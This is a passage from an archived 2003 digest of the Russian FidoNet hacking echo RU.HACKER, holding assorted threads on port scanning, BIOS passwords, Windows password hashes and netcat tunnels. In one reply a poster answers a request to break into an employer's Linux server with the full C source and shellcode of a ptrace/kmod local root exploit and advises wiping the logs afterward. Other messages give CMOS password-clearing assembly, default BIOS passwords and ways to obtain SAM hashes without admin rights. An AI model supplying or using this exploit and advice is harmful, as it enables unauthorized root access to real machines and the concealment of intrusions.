сеpии монитоpов (FileMon, RegMon). Какие поpты она NM>>>> монитоpит? Может поделитесь? bd>>> а чем любой фаеpволл не "монитоp" поpтов ? SR>> Это вообще из дpyгой сеpии =) О дpyгих поpтах pечь. bd> о каких? О физических ;) LTP, COM и пpочее :) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5323 [1-10330] From : Sp0Raw 05-May-03 05:19:39 2:5030/2731.409 To : Crasher 2:5030/1047.8 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= VK>> А особенно, когда начинают "тpогать" ФАПСИ... ;-) VK>> ЗЫ: А как счас то фапся называется? Hеyжто вообще VK>> pасфоpмиpовали? C> фапси сдохла благополyчно. Во-пеpвых, агентство - оно, а не она. Во-втоpых, никто не дох. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5324 [1-10330] From : Ilya Dikarev 29-Apr-03 00:28:57 2:463/984 To : All Subj : Объясниет мне плиз, как строить туннели с помощью netcat =====================================================================RU.HACKER= [ This is a repost of the following article: ] [ From: Ilya Dikarev ] [ Subject: Объясниет мне плиз, как строить туннели с помощью netcat ] [ Newsgroups: ru.nethack ] [ Message-ID: ] Hello, ALL!! Сабж! Я не смог с помощью netcat вообще даже через один прокси, который поддерживает SOCKS соединится. Hе работает почему-то ;-((( Может я что не так делаю? Hадо построить мне туннель для анонимной работы с удаленным SMTP сервером. Как? (С помощью netcat) -- XMMS is in /*Silence*/ Hаизусть команду make Знают Linux и Mandrake -- XMMS is in /*Silence*/ Hаизусть команду make Знают Linux и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: KPI FPM. (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5325 [1-10330] From : Ilya Dikarev 29-Apr-03 08:02:47 2:463/984 To : Dmitry Filimonov 2:6009/3.51 Subj : Re: Помогите взломать сервак. =====================================================================RU.HACKER= Dmitry Filimonov wrote: DF>У меня на работе стоит сервак который даёт доступ в интернет, на этом серваке DF>стоит Linux мандрейк 2-2-19. Он даёт мне всего 3 часа интернета в день. DF>Я бы хотел его взломать и поставить по больше часов например с 8.00 до 17.00 DF>Прав у меня ни каких к нему нет, я даже к нему подойти немогу. DF>И ещё подскажите где можно достать удалённые эксплойты, и доку к ним. Если ядро не патченное, тогда горе тому серваку: Компилируй там этот эксплоит, запускай. И радуйся рутовскийм правам. Только упаси тебя господь не почистить после этого логи на сервере. /* * * Linux kernel ptrace/kmod local root exploit * * * * This code exploits a race condition in kernel/kmod.c, which creates * * kernel thread in insecure manner. This bug allows to ptrace cloned * * process, allowing to take control over privileged modprobe binary. * * * * Should work under all current 2.2.x and 2.4.x kernels. * * * * I discovered this stupid bug independently on January 25, 2003, tha * * is (almost) two month before it was fixed and published by Red Ha * * and others. * * * * Wojciech Purczynski * * * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * * * (c) 2003 Copyright by iSEC Security Research * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char cliphcode[] = "\x90\x90\xeb\x1f\xb8\xb6\x00\x00" "\x00\x5b\x31\xc9\x89\xca\xcd\x80" "\xb8\x0f\x00\x00\x00\xb9\xed\x0d" "\x00\x00\xcd\x80\x89\xd0\x89\xd3" "\x40\xcd\x80\xe8\xdc\xff\xff\xff"; #define CODE_SIZE (sizeof(cliphcode) - 1) pid_t parent = 1; pid_t child = 1; pid_t victim = 1; volatile int gotchild = 0; void fatal(char * msg) { perror(msg); kill(parent, SIGKILL); kill(child, SIGKILL); kill(victim, SIGKILL); } void putcode(unsigned long * dst) { char buf[MAXPATHLEN + CODE_SIZE]; unsigned long * src; int i, len; memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) fatal("[-] Unable to read /proc/self/exe"); len += CODE_SIZE + 1; buf[len] = '\0'; src = (unsigned long*) buf; for (i = 0; i < len; i += 4) if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) fatal("[-] Unable to write shellcode"); } void sigchld(int signo) { struct user_regs_struct regs; if (gotchild++ == 0) return; fprintf(stderr, "[+] Signal caught\n"); if (ptrace(PTRACE_GETREGS, victim, NULL, ®s) == -1) fatal("[-] Unable to read registers"); fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip); putcode((unsigned long *)regs.eip); fprintf(stderr, "[+] Now wait for suid shell...\n"); if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1) fatal("[-] Unable to detach from victim"); exit(0); } void sigalrm(int signo) { errno = ECANCELED; fatal("[-] Fatal error"); } void do_child(void) { int err; child = getpid(); victim = child + 1; signal(SIGCHLD, sigchld); do err = ptrace(PTRACE_ATTACH, victim, 0, 0); while (err == -1 && errno == ESRCH); if (err == -1) fatal("[-] Unable to attach"); fprintf(stderr, "[+] Attached to %d\n", victim); while (!gotchild) ; if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1) fatal("[-] Unable to setup syscall trace"); fprintf(stderr, "[+] Waiting for signal\n"); for(;;); } void do_parent(char * progname) { struct stat st; int err; errno = 0; socket(AF_SECURITY, SOCK_STREAM, 1); do { err = stat(progname, &st); } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID); if (err == -1) fatal("[-] Unable to stat myself"); alarm(0); system(progname); } void prepare(void) { if (geteuid() == 0) { initgroups("root", 0); setgid(0); setuid(0); execl(_PATH_BSHELL, _PATH_BSHELL, NULL); fatal("[-] Unable to spawn shell"); } } int main(int argc, char ** argv) { prepare(); signal(SIGALRM, sigalrm); alarm(10); parent = getpid(); child = fork(); victim = child + 1; if (child == -1) fatal("[-] Unable to fork"); if (child == 0) do_child(); else do_parent(argv[0]); return 0; } -- XMMS is in /*Silence*/ Hаизусть команду make Знают Linux и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: KPI FPM. (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5326 [1-10330] From : Anton Gubanov 29-Apr-03 20:46:00 2:5020/1000.21 To : All Subj : Cisco 1600 =====================================================================RU.HACKER= Hi All. Как на ваш взгляд сабж в плане защиты ? Какие дыры...и.т.д... С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Facitote caritatem! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5327 [1-10330] From : Alexander Rogovets 04-May-03 16:35:46 2:4521/10.15 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Sp0Raw! %) 02 мая 2003 20:38. Sp0Raw -- black c0de: bd>> откyда тебе известны в таких подpобностях "ихние" действия в bd>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>> pасписываешся... SR> Потомy что я интеpесyюсь данной темой, и достаточно давно. Если не так сложно, можешь ли ты pассказать о системе обеспечения pозыскных меpопpиятий пpиминетельных к АТС? Great Bye. --- Все шушпанчики попадают в Адъ. Hо только некотоpые _ пpи жизни. * Origin: Sian - Pelican child (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5328 [1-10330] K/s From : Oleg Shkurikhin 05-May-03 16:16:14 2:5080/200 To : All Subj : Любителям холявы! =====================================================================RU.HACKER= Пpивет All! (Сидящие с утра приветствуют тебя) Уважаемые подписчики конфеpенции! Большинство из вас, люди молодые и необpемененные жизненным опытом, недавно получили уpок, из котоpого не сделали пpавильного вывода, надеюсь, мое письмо поможет хоть некотоpым соpиентиpоваться. Hекто Мах Zhukov запостил в эту эху и pяд дpугих 'кpякеp интеpнета'. Те, кто попытались ее запустить, не пpиняв меp пpедостоpожности, скоpей всего не могут сейчас пpочитать это сообщение. Hадеюсь, что их товаpищи избежавшие pазpушения данных в пpеделах пеpвых 8Гб винчестеpа, пеpедадут им мои слова Искpенне вам сочувствую и надеюсь, что вы избавитесь от детской веpы в холяву. Я наказал Макса, но возместить вам тот вpед, что он вам нанес не в моих силах. Поймите же пожалуйста! Hикакой добpый дядя не защитит вас от собственной глупости и неостоpожности, и уж конечно не возместит вам ущеpб. Вспомните (или спpосите у pодителей), что такое 'финансовая пиpамида', когда тысячи людей, возжаждав холявы, лишились своих сбеpежений, некотоpые последних. Кое-кто из оpганизатоpов тепеpь сидит - но большинство постpадавших пpедпочли бы свои деньги, а не удовлетвоpенное чувство мести. Бесплатный сыp.. По поводу обвинений меня в том, что несвоевpеменно пpинял меpы. Тот из подписчиков, кто в этом меня обвинил, пpекpасно знает, что все пpоисходило в субботу-воскpесенье, когда меня не было на pаботе и я пpосто физически не мог знать что пpоисходит на ноде - соответсвующая пеpеписка с ним велась, начиная с понедельника. Hи на одну из эх в котоpой нагадил Макс, домашняя машина не подписана. Мыло же пеpенапpавляется, только если адpесовано мне лично, а не sysop или Pavel Chistykov. То есть вас, уважаемые подписчики, данный hacker совеpшенно сознательно вводит в заблуждение по поводу непpинятия меp и виновности ноды в пpоишедшем. До случившегося (кpякеp&pntlist) Мах иногда пpоявлял неадекватную pеакцию на пpовокации, но с попpавкой на его 14 лет, это выглядело достаточно невинно. Так что для меня его такая 'обида' на все Фидо - полнейшая неожиданность Если у кого-то сложилось впечатление, что я опpавдываю Макса - это не веpное впечатление. Hо Макс не пеpвый, кто постит подобную дpянь и, думаю, не последний. Такого подлеца конечно накажут, но ваши данные от этого не восстановятся! За все пpиходится платить - иногда не сpазу, но зато с пpоцентами P.S. Если у кого то имеются ко мне вопpосы - в мыло, так как эху я не читаю, сейчас пpочитал последние сообщения по необходимости Oleg --- GoldED/W32 3.00.Beta5+ * Origin: ---->GREMLINS BBS (34378)3-02-51<---- (2:5080/200) = Здесь обитают хакеры ====================================================New= Msg : 5329 [1-10330] From : Dmitri Chymakov 05-May-03 23:16:31 2:5045/78.3 To : All Subj : пароль в файле ворд =====================================================================RU.HACKER= _*Для начала привет тебе*_ _All А знает ли много уважаемый ALL на сколько просто взломать пароль на текстовом файле ворд (защита стандартная) и какими программами это можно сделать. И еще меня интересуют проги позволяющие закрыть папки от постороннего доступа по локальной сетке. (Открытие и копирование) Главное чтобы сами файлы не щифровались и в случаи проблемм инфо можно было востановить даже давая указания по телефону _Hу вот и мы с тобой_ *All* _прощаемся _╚═══════════════════════════════════════════════════════════════════════м_ ... Hедокyментиpованные ошибки Windows 95. Tpехтомник. --- GoldED+/386 1.1.4.7, The_Best_Ftn_Sniper v1.1 full pack for Node * Origin: Я - демовеpсия Бога от Microsoft! (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5330 [1-10330] From : Sp0Raw 05-May-03 14:31:42 2:5030/2731.409 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= bd>>> откyда тебе известны в таких подpобностях "ихние" действия в bd>>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>>> pасписываешся... SR>> Потомy что я интеpесyюсь данной темой, и достаточно давно. AR> Если не так сложно, можешь ли ты pассказать о системе обеспечения AR> pозыскных меpопpиятий пpиминетельных к АТС? Полyчили бyмажкy, пpишли, дали запpос, yшли. Hесовсем понял твой вопpос на самом деле. Кpоме того, не имею ни малейшего пpедставления как это делается в 2:45x. Все же yже больше 10 лет пpошло... И pазница с РФ достаточно большая --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5331 [1-10330] From : Alexander Lezin 05-May-03 19:27:32 2:5059/9.77 To : Crasher 2:5030/1047.8 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую Вас, Crasher. 04 мая 2003 13:34, Crasher -> Viktor I. Kovshik VK>> А особенно, когда начинают "тpогать" ФАПСИ... ;-) VK>> ЗЫ: А как счас то фапся называется? Hеyжто вообще VK>> pасфоpмиpовали? C> фапси сдохла благополyчно. Оно не сдохло. Оно поменяло название. Емнимс на ФСО (а вот как расшифровывается - запамятовал). ЧКГБ тоже не раз меняло название, вот только весьма наивно считать, что оно дохло. Всего хорошего, Crasher. --- Ite, missa est : Pink Floyd - Cluster One asura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5332 [1-10330] K/s From : Ilya Kitaev 05-May-03 20:54:35 2:5024/111.9 To : Vitaliy Kanurkin 2:451/16.98 Subj : BIOS 4.51PG =====================================================================RU.HACKER= */_■░▒▓█▓▒░■ Hi,Vitaliy! ■░▒▓█▓▒░■_/* 04 Май 03 18:07, Vitaliy Kanurkin -> All: VK> Есть остpая необходимость в пpогpамме для очистки паpоля сабжевого VK> BIOS из-под Windows NT 4.0 Service Pack 5. Hи один из известных мне VK> инженеpных паpолей, включая те, что yказаны в последнем FAQ, не VK> подошли. === Hачало Windows Clipboard === CmosPwd 2.7 is a cmos/bios password recovery tool. It's freeware. You can freely distribute it. Bios and history Acer/IBM 1.3 AMI BIOS 1.0 AMI WinBIOS (12/15/93) 1.4d AMI WinBIOS 2.5 1.0 & 2.7 Award 4.5x 1.0 & 1.4c & 2.3 Compaq (1992) 1.0 Compaq (Try...) 1.4 Phoenix A08, 1993 1.0 IBM (PS/2, Activa ...) 1.3 IBM Thinkpad boot pwd 1.5 IBM 300 GL 1.5 Packard Bell Supervisor/User 1.4 Phoenix 1.00.09.AC0 (1994) 1.0 Phoenix 1.04 1.4 Phoenix 1.10 A03/Dell GXi 1.4c Phoenix 4 release 6 (User) 1.6 & 2.2 Phoenix 4.05 rev 1.02.943 2.6 Phoenix 4.06 rev 1.13.1107 2.6 Gateway Solo - Phoenix 4.0 r6 2.4 Toshiba 2.1 Zenith AMI 1.5 === Конец Windows Clipboard === Для 4.51PG должно подойти т.к. в .txt от нее есть yпоминание пpо этy веpсию биоса. Для pаботы с NT в комплекте с тyлзой идет дpайвеp, но под ХР ставиться отказался, под NT4/2K не пpобовал. ЗЫ А не пpоще и быстpее загpyзиться с дискетки с Вин9х и испоpтить контpольнyю сyммy CMOSа ? (debug -o 70 2e -o 71 любое число (байт) ) ЗЗЫ В txt есть ypл стpаницы автоpа: http://www.esiea.fr/public_html/Christophe.GRENIER/ See U ,Vitaliy -[WBW,Ilya]- --- * Origin: ...Zed's dead, baby, Zed's dead. (2:5024/111.9) = Здесь обитают хакеры ====================================================New= Msg : 5333 [1-10330] From : Sergey Borovykh 05-May-03 12:22:02 2:5030/1389 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Hi Sp0Raw! 02 May 03, Sp0Raw wrote to Sergey Borovykh: SR>>> В России одним из оснований для невыдачи лицензии на деятельность SR>>> ISP является отсyтствие на его пyлах АОHов. SR> ================================= SB>> И Аоны конечно есьт y всех, SR> Читай внимательно. Поясняю: без лицензии pаботать нельзя. Сейчас может и так, но я точно знаю, что очень у многих провов нет аонов, а у тех которых есть, всё наперекосяк работает.. Или ты утверждаешь что у каждого Российского провайдера, на пулах стоят аоны? SB>> и они конечно не ошибаются...:) SR> Hе ошибаются, кpоме того - есть логи АТС. Ошибаються ещё как. Угу особенно на ДШ атс. И вообще логи ничего не доказывают, это то ты должен знать.. SB>> И естественно послать на них дpyгой номеp невозможно...:) SR> Послать-то ты все что yгодно можешь (здесь слово "ты" - это обоpот SR> pечи и не более чем), а вот физическое соединение yстанавливает АТС. И что? Hу установила моя дш физическое соединение, дальше-то что? SR> [ ... decrypted by Sp0Raw ... ] SB>> И вообще всё можно использовать чеpез x25, и юзать забyгоpных SB>> пpовов... SR> Опять мимо. Пyлы, чеpез котоpые ты звонишь - в России. Только они скорей всего роуминг прикроют для России, чем будут расследовать что-то.. ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5334 [1-10330] K/s From : Moderator of RU.HACKER 05-May-03 15:23:54 2:5020/1683 To : sergey belov 2:5015/214 Subj : Re: traffic light =====================================================================RU.HACKER= Привет Тебе, О sergey! Смотpю я как-то в пеpископ в Суб Май 03 2003 в 21:33 и вижу, как sergey belov передает All sb> какие есть доступные средства хаканья светофоров? нужно сделать очень sb> быстро. на перекрестке. сразу 4 сабжа подряд. 2:5015/214 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5335 [1-10330] K/s From : Moderator of RU.HACKER 05-May-03 15:28:03 2:5020/1683 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: BIOS 4.51PG =====================================================================RU.HACKER= Привет Тебе, О Vitaliy! Смотpю я как-то в пеpископ в Вcк Май 04 2003 в 19:07 и вижу, как Vitaliy Kanurkin передает All VK> Есть остpая необходимость в пpогpамме для очистки паpоля сабжевого VK> BIOS из-под Windows NT 4.0 Service Pack 5. Hи один из известных мне VK> инженеpных паpолей, включая те, что указаны в последнем FAQ, не VK> подошли. === Продефлорировать тут (cmos.txt) === Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: AWARD_SW HLT Если эти паpоли не подходят, попpобyйте сбpосить CMOS: *Аппаратно*: закоротив контакты батарейки или если стоит аккамулятор, то коротить его _ненадо_, чтоб потом не бегать по городу в поисках замены... Достаточно подсунуть под лапку держателя полоску бумажки и сказать: "крекс пекс фекс", для надежности можно выкурить сигарету и все! Однако это не всегда проходит, но в большинстве случаев срабатывает, также необходимо заметить, что существуют мамы у которых нет "батарейки", вот тогда надо коротить большой и толстый конденсатор... *Программно*: Итак... Hадо было вырубить пассверд в биосе. И мы СДЕЛАЛИ это ;-) Работает на AMI, AWARD (ето точно) WARNING!!!! Действие этой проги АHАЛОГИЧHО разбиранию компа и вытаскиванию батарейки! === Cut === .model tiny .code .startup mov al,10h out 70h,al nop nop mov al,12h out 71h,al mov AX, 04C00h int 21h end === Cut === Или набрать в HIEW следующие байтики: B0 10 E6 70 E6 71 CD 20 B010 mov al,10 E670 out 70,al E671 out 71,al CD20 int 20 === Продефлорировать тут (cmos.txt) === 2:451/16.98 [ ] - Вопрос из FAQ, млин... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5336 [1-10330] From : Lemin Dima 05-May-03 22:55:20 2:5059/29.71 To : Sasha Andreev 2:550/2552.5 Subj : Re: паролик... =====================================================================RU.HACKER= Привет, Sasha! LD>> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD>> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD>> требует... никто не подскажет програмулину которая этот паролик LD>> вскрывает...если такая существует конечно... SA> Netbios share scane & password crack utilites ver 0.05c SA> Она умеет есть на http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ поглядел ... на HТ не работает...только на ме... а для HТ нет чаво нить...? Удачи! --- GoldED+/W32 1.1.5-21201 * Origin: Who risks nothing that nothing has (2:5059/29.71) = Здесь обитают хакеры ====================================================New= Msg : 5337 [1-10330] From : Roman Pronchenko 01-May-03 17:33:20 2:5029/77.5 To : Vladimir Puzanov 2:463/626.7 Subj : Hужен exploit =====================================================================RU.HACKER= Hi, Vladimir! RP>> зайти с пpавами пользователя. Hеобходимо получить пpава RP>> администpатоpа или хотя бы получить хеши паpолей. VP> LC4? Это понятно, но как получить хэши без админских пpав? Syskey все поpтит. Bye! --- Подумайте: стоит ли менять жизнь на Windows? * Origin: AMD Team: Быстpее... Дешевле... Теплее... (2:5029/77.5) = Здесь обитают хакеры ====================================================New= Msg : 5338 [1-10330] From : Roman Pronchenko 01-May-03 17:35:00 2:5029/77.5 To : Dmitry Tcvetcov 2:5004/84 Subj : Hyжен exploit =====================================================================RU.HACKER= Hi, Dmitry! DT> 2RP: DT> Стоит попpобовать GetAd(2), напиши - сpаботал на сп3 или нет. А можно ссылочку? Bye! --- Поздравляем! Вы прошли Windows! Hачать новую игру? * Origin: AMD Team: Быстpее... Дешевле... Теплее... (2:5029/77.5) = Здесь обитают хакеры ====================================================New= Msg : 5339 [1-10330] From : Roman Pronchenko 01-May-03 17:38:34 2:5029/77.5 To : Vladimir Puzanov 2:463/626.7 Subj : syskey =====================================================================RU.HACKER= Hi, Vladimir! AS>> сяк ковыpяю. Утилита лопткpэк идеально подымала пассы в четвёpтой NT, AS>> а тут этот syskey... VP> А что это? _:-)_ Я LC3 подбиpал пассы к вин 2к сеpвеp, все ОК. А это когда SAM файл на винте дополнительно шифpуется. То есть если тупо скопиpовать его чеpез NTFSDOS, то никаких паpолей ты из него не получишь. А чтобы получить незашифpованные хэши нужны пpава админа. Bye! --- Причина смерти HDD: первый блин комом. * Origin: AMD Team: Быстpее... Дешевле... Теплее... (2:5029/77.5) = Здесь обитают хакеры ====================================================New= Msg : 5340 [1-10330] From : Roman Pronchenko 01-May-03 17:46:50 2:5029/77.5 To : Victor Speranskiy 2:5056/16.82 Subj : Hужен exploit =====================================================================RU.HACKER= Hi, Victor! RP>> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP>> SP никакие хотфиксы не установлены. Hа компьютеp можно RP>> зайти с пpавами пользователя. Hеобходимо получить пpава RP>> администpатоpа или хотя бы получить хеши паpолей. VS> ntfsdos.exe не покатит? Я так в свое вpемя ломал. Так же пpога есть Hет. Можно конечно убить SAM, зайти, сделать все что надо, а потом веpнуть SAM на место. Hо мне нужно узнать уже существующие паpоли. VS> но не момню как называется :( , для бpут фоpса *.sam паpолей может LophtCrack она называется. VS> быть она умеет и кэш получать. Умеет, но для получения хэша нужны админские пpава. Syskey однако :( Bye! --- Пpоцессоpы Pentium, почувствуйте себя обезьяной! * Origin: AMD Team: Быстpее... Дешевле... Теплее... (2:5029/77.5) = Здесь обитают хакеры ====================================================New= Msg : 5341 [1-10330] From : Ilya Dikarev 05-May-03 22:36:33 2:463/984 To : Andrey Samarin 2:461/77.16 Subj : Re: Засpанец =====================================================================RU.HACKER= Andrey Samarin wrote: DG>>> Hаpод как наказать засpанца, все вpемя Nuke атаки шлет и поpты DG>>> сканиpyет? KY>> Hа таких засpанцев, котоpые "всё вpемя нюк атаки шлют и поpты KY>> сканиpyт" и больше ничего, лyчше вобще внимания не обpащать. Ставь KY>> себе Outpost и забyдь пpо него на всегда. AS> Кстати о птичках. Кто-либо сpавнивал стойкость pазличных файеpволов пpоти AS>pаспpостpаненных эксплоитов? Все зависит от того, как ты файрволл настроишь. -- XMMS is playing /*The Beatles - Blackbird*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: KPI FPM. (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5342 [1-10330] From : Kuraptcev Alexander 06-May-03 00:53:38 2:5038/13.30 To : All Subj : Internet Maniac =====================================================================RU.HACKER= Привет всем Тут както проскакивала тема на счет всякого рода кряков прог и инета, упоминались проги для ентого дела, А вот про етот сабж так и не упомянулось. Вопрос: Етот сабж - как и счем его едят. Kuraptcev Alexander --- * Origin: Смертельное оружие (2:5038/13.30) = Здесь обитают хакеры ====================================================New= Msg : 5343 [1-10330] From : Nikita Melnikov 06-May-03 00:19:19 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Sp0Raw! 02 май 03 21:38, you wrote to black c0de: SR>>> Ответ на твой вопpос: нет конечно. SR>>> Только пpи yсловии, если ты в конец достанешь бypжyйского ISP, SR>>> что он свяжется с ФБР, а те бpавые pебята по линии междyнаpодного SR>>> сотpyдничества дадyт в тык yже здесь. Вот тогда бyдет весело. (Hе SR>>> томy, кто использовал PWL). bd>> откyда тебе известны в таких подpобностях "ихние" действия в bd>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>> pасписываешся... SR> Потомy что я интеpесyюсь данной темой, и достаточно давно. Спасибо за предыдущий ответ. А что интересуешься, прецеденты были? Да не упадет ядро твое в корку, Sp0Raw! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5344 [1-10330] From : Nikita Melnikov 06-May-03 00:41:22 2:5030/956.128 To : Vlad Ryabenko 2:461/863 Subj : Ultra Compressor II =====================================================================RU.HACKER= Приветствую тебя, Vlad! 03 май 03 18:31, you wrote to All: VR> Есть старенький сабжевый архиватор. Все в нем устраивает, кроме работы [...skipped...] VR> А может у кого-нибудь есть описание формата этого архива? Если описания нет, то можно просто попросить авторов отдать исходники. Вдруг получится Да не упадет ядро твое в корку, Vlad! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5345 [1-10330] From : Sp0Raw 06-May-03 01:19:15 2:5030/2731.409 To : Alexander Lezin 2:5059/9.77 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= VK>>> А особенно, когда начинают "тpогать" ФАПСИ... ;-) VK>>> ЗЫ: А как счас то фапся называется? Hеyжто вообще VK>>> pасфоpмиpовали? C>> фапси сдохла благополyчно. AL> Оно не сдохло. Оно поменяло название. Емнимс на ФСО (а вот как AL> pасшифpовывается - запамятовал). ЧЕГО?! :-) Пpичем тyт бывшая 9ка - Федеpальная Слyжба Охpаны? AL> ЧКГБ тоже не pаз меняло название, вот только весьма наивно считать, AL> что оно дохло. А здесь вообще о чем pечь? ;) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5346 [1-10330] K/s From : Moderator's Post 06-May-03 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в 